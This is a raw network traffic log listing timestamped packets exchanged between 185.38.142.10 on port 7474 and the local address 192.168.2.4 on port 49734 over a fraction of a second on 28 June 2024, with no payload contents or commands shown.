Jun 28, 2024 08:58:04.832962990 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832966089 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832982063 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833010912 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833024979 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833024979 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833035946 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833046913 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833065987 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833095074 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833110094 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833133936 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833144903 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833153009 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833163977 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833173037 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833183050 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833184958 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833201885 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833204031 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833214998 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833225012 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833233118 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833235025 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833245993 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833245993 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833259106 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833268881 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833286047 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833311081 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833323956 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833333969 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833343983 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833352089 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833362103 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833369970 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833384991 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833391905 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833401918 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833411932 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833426952 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833444118 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833446980 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833456993 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833467007 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833492994 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833503008 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833503008 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833517075 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833547115 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.833575010 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833585024 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833592892 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833604097 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833647013 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833656073 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833663940 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833674908 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833693027 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833703041 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833735943 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833745003 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833754063 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833772898 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833782911 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833802938 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833811998 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833822966 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833832979 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833899021 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833909035 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833957911 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833967924 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.833992958 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834002972 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834011078 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834021091 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834041119 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834072113 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834094048 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834114075 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834131002 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834141016 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834176064 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834186077 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834193945 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834230900 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834249020 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834259033 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834269047 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834278107 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834316969 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834326982 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834335089 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834350109 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834368944 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834378004 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834387064 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834414959 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834424973 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834439039 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834460020 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834470034 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834479094 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834537983 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834547997 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834566116 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834574938 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834587097 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834595919 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834659100 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834669113 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834676981 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834686995 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834696054 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834707975 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834717035 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834728003 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834738016 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834755898 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834764957 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834773064 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834783077 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834820986 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834830999 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834840059 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834849119 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834858894 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834868908 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834887981 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834897041 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834904909 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834914923 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834923983 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834948063 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834958076 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834966898 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.834978104 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835002899 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835014105 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835021973 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835047007 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835057020 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835154057 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835164070 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835172892 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835182905 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835191965 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835201979 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835210085 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835220098 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835238934 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835247040 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835254908 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835264921 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835354090 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835362911 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835385084 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835392952 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835401058 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835411072 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835419893 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835429907 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835439920 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835448027 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835458040 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835467100 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835470915 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835474014 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835484028 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835493088 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835511923 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835520983 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835525036 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835534096 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835542917 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835551023 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835571051 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835581064 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835588932 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835598946 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835607052 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835618019 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835639000 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835649014 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835655928 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835665941 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835685968 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835695028 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835721970 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835756063 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835891008 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835901022 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835908890 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835918903 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835927963 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835937023 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835946083 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835966110 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835974932 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835983992 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.835994005 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836003065 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836021900 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836030960 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836040020 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836049080 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836087942 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836097002 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836106062 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836116076 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836123943 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836133003 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836142063 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836150885 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836169004 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836178064 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836185932 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836536884 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836548090 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836596966 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836606979 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836702108 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836711884 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836767912 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836777925 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836812019 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836822987 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836832047 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.836842060 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837203979 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837328911 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837338924 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837373972 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837383986 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837444067 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837454081 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837462902 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837508917 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837518930 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837527990 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837538958 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837558031 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837567091 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837575912 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837584972 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837594032 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837605953 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837614059 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837657928 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837667942 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837676048 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837701082 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837712049 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837729931 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837738991 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837748051 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837758064 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837766886 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837774992 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837795019 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837805033 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837811947 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837851048 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837872028 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837882042 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837892056 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.837996006 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838006020 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838080883 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838103056 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838110924 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838206053 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838216066 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838237047 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838247061 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838254929 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838300943 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838310957 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838321924 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838403940 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838414907 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838424921 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838458061 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838469982 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838507891 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838517904 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838560104 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838570118 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838578939 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838588953 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838607073 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838615894 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838624001 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838635921 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838654995 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838713884 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838723898 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838732004 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838753939 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838762999 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838772058 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838782072 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838800907 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838809967 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838865042 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838874102 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838884115 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838921070 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838931084 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838989019 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.838999033 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839036942 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839046955 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839056015 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839066029 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839083910 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839092970 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839102030 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839114904 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839200974 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839253902 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839302063 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839310884 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839394093 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839402914 CEST	7474	49734	185.38.142.10	192.168.2.4
